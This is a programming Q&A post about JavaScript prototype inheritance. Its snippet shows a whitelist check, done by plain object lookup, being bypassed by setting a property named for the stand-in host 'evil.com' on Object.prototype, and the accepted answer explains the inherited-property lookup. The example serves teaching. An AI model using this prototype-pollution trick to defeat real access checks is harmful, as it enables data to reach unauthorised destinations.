# What is the semantics of Object.prototype when used like this

Tags: javascript, security

I have a little experience in Javascript and its prototype-based model, however I have the following Javascript snippet that demonstrate the problem of cross-site scripting attack that I do not understand. What happened when Object.prototype was invoked, how whitelist array is updated?

```
function send (u,m) {console.log(m);}
function protect ( send ) {
var whitelist ={" https :// microsoft . com / mail ":true ,
" https :// microsoft . com / owa ": true };
return function (url , msg) {
if ( whitelist [ url ]) send (url , msg);
};
} send = protect ( send );
Object . prototype [" http :// evil . com "]= true ;
send (" http :// evil . com ", " bypass !");
```

Comment: could format it better ^^

Answer (score 2, accepted):

> What happened when Object.prototype was invoked

The line

```
Object.prototype [" http :// evil . com "] = true;
```

does simply create a property on `Object.prototype` with the value `true`. Nothing else happens here.

> how whitelist array is updated?

`whitelist` is not an array, it's an object that is used for a map. As all objects, it does inherit from `Object.prototype`.

Nothing odd happens really until the protected `send` function is called. There, it will look up the passed `url` as a property on `whitelist`. Now whitelist doesn't have this property (itself), so - here is where prototypical inheritance comes into play - it checks on the object it does inherit from. And indeed `Object.prototype` does have such a property, the lookup will yield `true`, and your condition unexpectedly is fulfilled.

> Javascript snippet that demonstrate the problem of cross-site scripting attack

I wouldn't call this a XSS attack. It just demonstrates how mighty prototypical inheritance is, and how easy it is to mess with other code (and how foul most attempts to `protect` anything are).

The actual attack vector, and your security problem, is however that a malicious piece like `Object.prototype[…]=true;` would be evaluated in your environment in the first place. If you can't control who executes code, then it's not safe.